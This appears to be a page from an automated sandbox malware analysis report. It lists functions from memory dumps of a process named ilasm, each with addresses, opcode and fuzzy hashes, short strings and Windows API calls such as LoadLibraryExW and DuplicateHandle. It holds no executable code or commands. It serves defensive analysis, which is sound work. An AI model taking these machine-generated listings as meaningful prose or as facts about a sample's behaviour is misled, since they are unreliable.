Instruction ID: 9158256ecafed009a2451e82606a5df0839cf74c0bb59b0cafe9f9b1def3b0df
Opcode Fuzzy Hash: 0d7f1fc1ba575015ecb5190133979f3829345fb95cbd7d89a5096e8b6529201e
Instruction Fuzzy Hash: 03E15535A10209DFCB04DFA4D4949ADBBB6FF88310F118569E806AB365DF34ED46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0DD70CE8 Relevance: 2.9, Strings: 2, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

T%s, xrefs: 0DD70FEA
T%s, xrefs: 0DD710FB

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: T%s$T%s
API String ID: 0-2924861223
Opcode ID: 20e775a7bdad45b15a6f7b771052e881cfeda8264b10ed8950ea41365c67cb4c
Instruction ID: a56cf5ca5a4fa64c9495edac7818cd249a5a7d57aad7f3f66de0b5a9e2b04e90
Opcode Fuzzy Hash: 20e775a7bdad45b15a6f7b771052e881cfeda8264b10ed8950ea41365c67cb4c
Instruction Fuzzy Hash: 44121C35A102198FCB14EF64C994AADB7B2FF89300F5186A8E549AB355EF70ED85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0DD76850 Relevance: 2.8, Strings: 2, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 0DD76B12
4']q, xrefs: 0DD76B49

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 5a4cb68bfa0232c9e8c078072660b15cefe891455e9d0298662d04138fb43d73
Instruction ID: 92801911e11d9547036b757492233e2761ac46d0a7b649d6cfa59cf2d51a8ae8
Opcode Fuzzy Hash: 5a4cb68bfa0232c9e8c078072660b15cefe891455e9d0298662d04138fb43d73
Instruction Fuzzy Hash: 4BD1DA75B10218CFCB04EFA8C995AAEB7B6FF89300F114169E506AB365DB71ED42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0DD76860 Relevance: 2.8, Strings: 2, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 0DD76B12
4']q, xrefs: 0DD76B49

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 4fd10e707a720120196154a07fea0c8b1fe9f1de83e9a1434ffbec01d4d7e9c0
Instruction ID: 7996034261f9d0aa0a2180bae8e928734e6a039108ba5325e317a4c5b4cdc402
Opcode Fuzzy Hash: 4fd10e707a720120196154a07fea0c8b1fe9f1de83e9a1434ffbec01d4d7e9c0
Instruction Fuzzy Hash: 85C1C774A10218CFDB04EFA8C995AADB7B6FF89300F114169E905AB3A5DB71ED42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79D78 Relevance: 2.7, Strings: 2, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0DD79E9D
Haq, xrefs: 0DD79EC9

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: (aq$Haq
API String ID: 0-3785302501
Opcode ID: 5fbc7def7b825e9c2d8151d56bb054de3de0ffd2ced175ae50980952f878c682
Instruction ID: 9f052c67812211ed52555ee5a22e6392f9e88740c2e329510a0ef188d8a91e02
Opcode Fuzzy Hash: 5fbc7def7b825e9c2d8151d56bb054de3de0ffd2ced175ae50980952f878c682
Instruction Fuzzy Hash: C351F5323047419FD725CF29C894B6B7BE6EF85320F1089AEE5568B391EB74E905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05C3BFF0 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.3308662809.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5c30000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e298517be409fd939691b983e75fad1b5f6c02ffdb589e31ee63174ed92aeb3
Instruction ID: 9f5c02068fad9b1b5a0f76807aea459b179c953f94f4766b4bec46a4b75ce7d0
Opcode Fuzzy Hash: 2e298517be409fd939691b983e75fad1b5f6c02ffdb589e31ee63174ed92aeb3
Instruction Fuzzy Hash: B98134B0A00B499FD724DF6AC445B6ABBF6BF88300F008969D48AD7A50D775E945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0DD71B00 Relevance: 1.6, Strings: 1, Instructions: 399
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0DD71C3D

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: d54cf2263ecab164a09e73f9705d639cf50998f04b8e78ea94054ea48c818091
Instruction ID: 07fd1730b29047328eb7a0c535b2f85d1cc64fd0262876b5e4e0b9f81e7af9bb
Opcode Fuzzy Hash: d54cf2263ecab164a09e73f9705d639cf50998f04b8e78ea94054ea48c818091
Instruction Fuzzy Hash: C5E16E327102149FCB05DFA8D894E6DBBB6FF89310B1581A9E505DB3A2DB35EC06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05C3670F Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05C3674E,?,?,?,?,?), ref: 05C3680F

Memory Dump Source

Source File: 00000019.00000002.3308662809.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5c30000_ilasm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f363112d3ba2ea2fbcdf8f6a5e3d740a0ed33b49692fa0f90c34bfc161a58f41
Instruction ID: f41078a89f4a03cda54c789195b2badf367d8fbc814075cd93846d293892c3fc
Opcode Fuzzy Hash: f363112d3ba2ea2fbcdf8f6a5e3d740a0ed33b49692fa0f90c34bfc161a58f41
Instruction Fuzzy Hash: F6411676900248AFCF01CF99D845AEEBFF5FF49310F14845AE954A7221C3399A54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C37364 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 05C37421

Memory Dump Source

Source File: 00000019.00000002.3308662809.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5c30000_ilasm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a1858a9cd29f44bf21773257f396abd4c39e0af3e5dcf567a530a509112690db
Instruction ID: a38c3e2548e4ebecf808be4929d39109107a444435e51e4b476973ab47899734
Opcode Fuzzy Hash: a1858a9cd29f44bf21773257f396abd4c39e0af3e5dcf567a530a509112690db
Instruction Fuzzy Hash: D541E0B0C0021DCADB28CFA9C844B9EBBF5FF49304F20846AD418AB255D7756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05C36414 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 05C37421

Memory Dump Source

Source File: 00000019.00000002.3308662809.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5c30000_ilasm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8374af7b0ff4fbb89fade81579f4e0591c994c1d750bc03540214a906a69ec3f
Instruction ID: ca8822a37821a5cd209aa7718594b39aa6346142b9397001983e96556935ce45
Opcode Fuzzy Hash: 8374af7b0ff4fbb89fade81579f4e0591c994c1d750bc03540214a906a69ec3f
Instruction Fuzzy Hash: 5C41D0B0C0061DCADB28DFA9C844B9DBBF5FF49304F20846AD419AB255DB756A46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05C36780 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05C3674E,?,?,?,?,?), ref: 05C3680F

Memory Dump Source

Source File: 00000019.00000002.3308662809.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5c30000_ilasm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3a071f46ea8b20eb5305be3662dea00fc8d9ecedd2db8e76002cc79384e4070f
Instruction ID: b077e2ee72100de81bfd5fae81a685abd4f5f5eb2a13405b1a2943505d6d8b16
Opcode Fuzzy Hash: 3a071f46ea8b20eb5305be3662dea00fc8d9ecedd2db8e76002cc79384e4070f
Instruction Fuzzy Hash: 663126B5901348AFCB10CFAAD984ADEBFF4FF09320F10845AE414A7251D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C3611C Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05C3674E,?,?,?,?,?), ref: 05C3680F

Memory Dump Source

Source File: 00000019.00000002.3308662809.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5c30000_ilasm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 89b3af0a78f20b7f4c7ab911033f8da903a34fcec3f51932918d2a58b91e1d0a
Instruction ID: 37e9903e9ff7713817aa5cb8bc1877385a102f8cf632d428200753cfea0b4d02
Opcode Fuzzy Hash: 89b3af0a78f20b7f4c7ab911033f8da903a34fcec3f51932918d2a58b91e1d0a
Instruction Fuzzy Hash: 2A21E6B5900248AFDB10CF9AD985ADEFFF5FB48310F14841AE914A3310D378A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0DD755C0 Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

Pl]q, xrefs: 0DD755DF

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: Pl]q
API String ID: 0-2207481929
Opcode ID: ec0f2fe06ba3e91e1797d9ea7e7a58cfde396e1454589848aa18d1a38c11542e
Instruction ID: ecad4f442de5b4284655e5b13e76c0315b27f2e43003b001ba2229d7fba36366
Opcode Fuzzy Hash: ec0f2fe06ba3e91e1797d9ea7e7a58cfde396e1454589848aa18d1a38c11542e
Instruction Fuzzy Hash: 49D10F34B112189FCB04EFA8D995EADB7B6FF88700F108558E905AB3A5DB71EC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05C3C294 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05C3C6D1,00000800,00000000,00000000), ref: 05C3C8E2

Memory Dump Source

Source File: 00000019.00000002.3308662809.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5c30000_ilasm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fceae68e3917f7161da57322bde9c90c2dc6a133e3c0a18b4253a78e12183c5c
Instruction ID: f0c2574b0934d5111b958feec3f1f6e38ddfb4fe97b836d8d279facd8bd70ef1
Opcode Fuzzy Hash: fceae68e3917f7161da57322bde9c90c2dc6a133e3c0a18b4253a78e12183c5c
Instruction Fuzzy Hash: 1811D3B69042499FDB10DF9AD444A9EFBF5EF48310F10882AE519B7210C379AA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C3C870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05C3C6D1,00000800,00000000,00000000), ref: 05C3C8E2

Memory Dump Source

Source File: 00000019.00000002.3308662809.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5c30000_ilasm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e757c8607875dd0287658afe994dd63b05a4e5debf9752194994bf254661432d
Instruction ID: 0676a9afbfe22e4b83d3491259ac628ea39ca7caa0c66c2e7c41faa8180898df
Opcode Fuzzy Hash: e757c8607875dd0287658afe994dd63b05a4e5debf9752194994bf254661432d
Instruction Fuzzy Hash: 6711D0B6D003499FDB10DFAAD444A9EFBF4BF98310F10882AD519B7210C379AA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C3C1F0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 05C3C256

Memory Dump Source

Source File: 00000019.00000002.3308662809.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5c30000_ilasm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 08c102b0825215a35855a275db4cb72262c66dbc53953aa59a4d44d9a0cc754a
Instruction ID: 2b38dfd72e954569ee52541d0dfd0e680d66fb88c6737cb39bb9aa849fd2b99a
Opcode Fuzzy Hash: 08c102b0825215a35855a275db4cb72262c66dbc53953aa59a4d44d9a0cc754a
Instruction Fuzzy Hash: 1B11E0B6C042498FCB10DF9AC444ADEFBF4EF89314F10855AD829B7610C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0DD75590 Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

Pl]q, xrefs: 0DD755DF

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: Pl]q
API String ID: 0-2207481929
Opcode ID: 4f33ec8c02d89e8470612f15da9554768e0cf7c1d2aed6c6ba5f29f5058138ff
Instruction ID: 1d4e93eccbd7b5ad5fd68864163443bde0d089bbb4f219a9284fa30bc5f3a5f3
Opcode Fuzzy Hash: 4f33ec8c02d89e8470612f15da9554768e0cf7c1d2aed6c6ba5f29f5058138ff
Instruction Fuzzy Hash: 27B13034B102189FCB04DFA8D995EADBBB6FF89700F108559E905AB3A5DB70EC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0DD755B2 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

Pl]q, xrefs: 0DD755DF

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: Pl]q
API String ID: 0-2207481929
Opcode ID: 158a5a17080d1e374ecff44eb88a8ce3c60ed6b4e97c64d7ce7919ec79394ff1
Instruction ID: 80df1231d5963d666573a470f16eecadf46e16596db335deccf341896a01a012
Opcode Fuzzy Hash: 158a5a17080d1e374ecff44eb88a8ce3c60ed6b4e97c64d7ce7919ec79394ff1
Instruction Fuzzy Hash: D4B11F34B102189FCB04DFA9D995EADBBB6FF88700F108558E905AB365DB71EC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0DD70AA8 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4']q, xrefs: 0DD70AE2

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: c4bab76d920a91dcdd5dc75ab4cd82a925e6847172df2296c631c3364e5bb318
Instruction ID: 892bd30c386338aa16ffb933cc6be5edc0a0b5f7221605c098cbd2f4fb69f087
Opcode Fuzzy Hash: c4bab76d920a91dcdd5dc75ab4cd82a925e6847172df2296c631c3364e5bb318
Instruction Fuzzy Hash: E04145307206188FCB04AB64C4959BEB7B7EFC9710F10852AE402EB394DF749D46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0DD70A99 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

4']q, xrefs: 0DD70AE2

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 3ffa8a1ee2c08d31f6b2af106679d8398d2b5ad629dfcd098edef689dbbde24d
Instruction ID: 9a7efeea81f5067289bccf54c3b779d665124d99c1db161903472fdd68e0c5d5
Opcode Fuzzy Hash: 3ffa8a1ee2c08d31f6b2af106679d8398d2b5ad629dfcd098edef689dbbde24d
Instruction Fuzzy Hash: DE2187307202188FDB08ABA4C899A7EBBAAEFC5700F10456EE406DB384DE749D45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79AF9 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

#, xrefs: 0DD79AFC

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 1fa5df5f151739f19cbbf2648dcf050e06a88aba653c2efa35dd330a664a8aac
Instruction ID: 89b0245f88fc7cc7028767b4901f97f9d231ca63da25cb576850897446004e10
Opcode Fuzzy Hash: 1fa5df5f151739f19cbbf2648dcf050e06a88aba653c2efa35dd330a664a8aac
Instruction Fuzzy Hash: 0F216D32A002189FCB15CF68C4949EE7FB6EF89320F148169E411B73A4DB75A846CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79491 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

xaq, xrefs: 0DD79491

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: xaq
API String ID: 0-793007810
Opcode ID: 8e56c4b6a9e763f2f0231be7533b0e4ad9856c8fbd32b2b2706fc89e19d2c19b
Instruction ID: fea1de4f135cc1fb98d4039399074754f12dea2cc316f508487ba8fe24dcf9f4
Opcode Fuzzy Hash: 8e56c4b6a9e763f2f0231be7533b0e4ad9856c8fbd32b2b2706fc89e19d2c19b
Instruction Fuzzy Hash: 9CF0A0357001009FDB04CB18DA40E69BBE9FF88214F158199E108AB362C771FC018F50

Uniqueness

Uniqueness Score: -1.00%

Function 0DD73840 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0892fbd34ac851d87c0d238a23ad7c39ecdcf69f670f156db24e036f38b4eb60
Instruction ID: 19d4687d21638d864ebf89420492bc926fcd1e1241017ee7ce4df34930774e8e
Opcode Fuzzy Hash: 0892fbd34ac851d87c0d238a23ad7c39ecdcf69f670f156db24e036f38b4eb60
Instruction Fuzzy Hash: F7423D35A00219DFCB15DF64C984E99BBB2FF89300F1285E9E509AB261DB31ED95CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0DD748C8 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29a3ca158cb89f26c23318e9df5d9b60ee412e55e2c840f61e9420a8484b09c7
Instruction ID: bf4ee2b8d1cd244f14328294cb78160ed2f06517372ad6c0dd3e477b428c310c
Opcode Fuzzy Hash: 29a3ca158cb89f26c23318e9df5d9b60ee412e55e2c840f61e9420a8484b09c7
Instruction Fuzzy Hash: 97C19E30B006199FDB15DF68D490BBE7BB6EF89300F1485A9E8029B395DB74ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0DD75A54 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a695eb8d7c683fa76a4b5e5ad7754d440f61d3f96e4b715e88de947dcbf10d
Instruction ID: 565968cb2fdaa11ddb8762ce18281862ed35995fb10380659d71fd32da614fe8
Opcode Fuzzy Hash: 31a695eb8d7c683fa76a4b5e5ad7754d440f61d3f96e4b715e88de947dcbf10d
Instruction Fuzzy Hash: CEB18134B106188FCB04EF74C594AAD7BB2FF89700B1085A9E4069B3A5EF75ED46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0DD75A88 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa6f5e60121c6442c612a16fcec0dfcfe480ed8adb8d61b68f09583ac1590fe3
Instruction ID: 81406e754cbf894a770998e7d5d025e6ed1b62ad36e65f0dc6dab9cef7cd871e
Opcode Fuzzy Hash: fa6f5e60121c6442c612a16fcec0dfcfe480ed8adb8d61b68f09583ac1590fe3
Instruction Fuzzy Hash: 6FA15E34B106188FCB04EF78C5949AE77B2EF89700F108659E9069B3A4EF75ED46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0DD70CD9 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e35cd4a1f08b8420b143453c7284fe6a3526ece34e5e63065c4171945383519
Instruction ID: 9ae95fdcb1c24c730064c00d6f984ea34d4f7bb763de12064b57000df957c06f
Opcode Fuzzy Hash: 0e35cd4a1f08b8420b143453c7284fe6a3526ece34e5e63065c4171945383519
Instruction Fuzzy Hash: 84A11D35A102198FCB14DF64C995BA9BBB2BF89300F5181E8E949AB351EF70ED85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0DD7960B Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b3daa97567e3c403ca44335e8210c9daca5c1aef90aa3f482960b2ab878456
Instruction ID: 3e0c9fbb1ff6415d00234264c0e38e3cce5414a3cdc4dc265ccca5c0eb452570
Opcode Fuzzy Hash: 85b3daa97567e3c403ca44335e8210c9daca5c1aef90aa3f482960b2ab878456
Instruction Fuzzy Hash: 6781D475A21228AFCB14CF98D990EADB7B6BF48314F158199F905AB366E731EC41CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0DD749F7 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f3a712e82d4c30d2dbd70e2d0037cb4226e49e28af5a01325a0df8e9149ae2
Instruction ID: 2bb662541028527d818a850afb5325889af0b363383a331b83376669148cabfa
Opcode Fuzzy Hash: e5f3a712e82d4c30d2dbd70e2d0037cb4226e49e28af5a01325a0df8e9149ae2
Instruction Fuzzy Hash: A1518D30B00618DFDB19EB64D595BAE77B2EF88300F108168E802AB791DB74ED42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0DD745A4 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d853b284784630e78dcc23b832ffaf184f0f6fbf02b5f57dbc78694abff60890
Instruction ID: 5fa1cde91246abda1e1f7c30d5cbdf6743564d9cb8b5e204854251fcfdd3662d
Opcode Fuzzy Hash: d853b284784630e78dcc23b832ffaf184f0f6fbf02b5f57dbc78694abff60890
Instruction Fuzzy Hash: 9D418332F045159FC714DB69D854AAEBBF6EFC9310B1585AAE509DB361DB31EC01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0DD7A098 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed8996ebc4a0bf518971f0f2c470b04a0bbe5c4a2b56997e0c3cdb4c2eb7ee43
Instruction ID: bb41cb5fad906599d43320196b57546acef204afb4f7e551e334fa9930fead60
Opcode Fuzzy Hash: ed8996ebc4a0bf518971f0f2c470b04a0bbe5c4a2b56997e0c3cdb4c2eb7ee43
Instruction Fuzzy Hash: 1141BF31B04B548FCB64CB78D5502AEBBF2EFC4610B0499AED55AC7A84EB34F945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0DD74D51 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95bfff8ef7903955f7958ebeb4edd4a563e00c950c70e843c66b67dc3cd626c
Instruction ID: 10329306f1d946f382cbf49c2cd7e7b7207287dd21561deff9d672e056866b2a
Opcode Fuzzy Hash: c95bfff8ef7903955f7958ebeb4edd4a563e00c950c70e843c66b67dc3cd626c
Instruction Fuzzy Hash: 1E315335B106488FCB05EF78C49596E7BB6EF89700B10819AE902DB365EF749D06CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0DD71FC8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180156d5abf5f17811e3d2193f95ab79cd77982d63662183a0ffcf5620e901f1
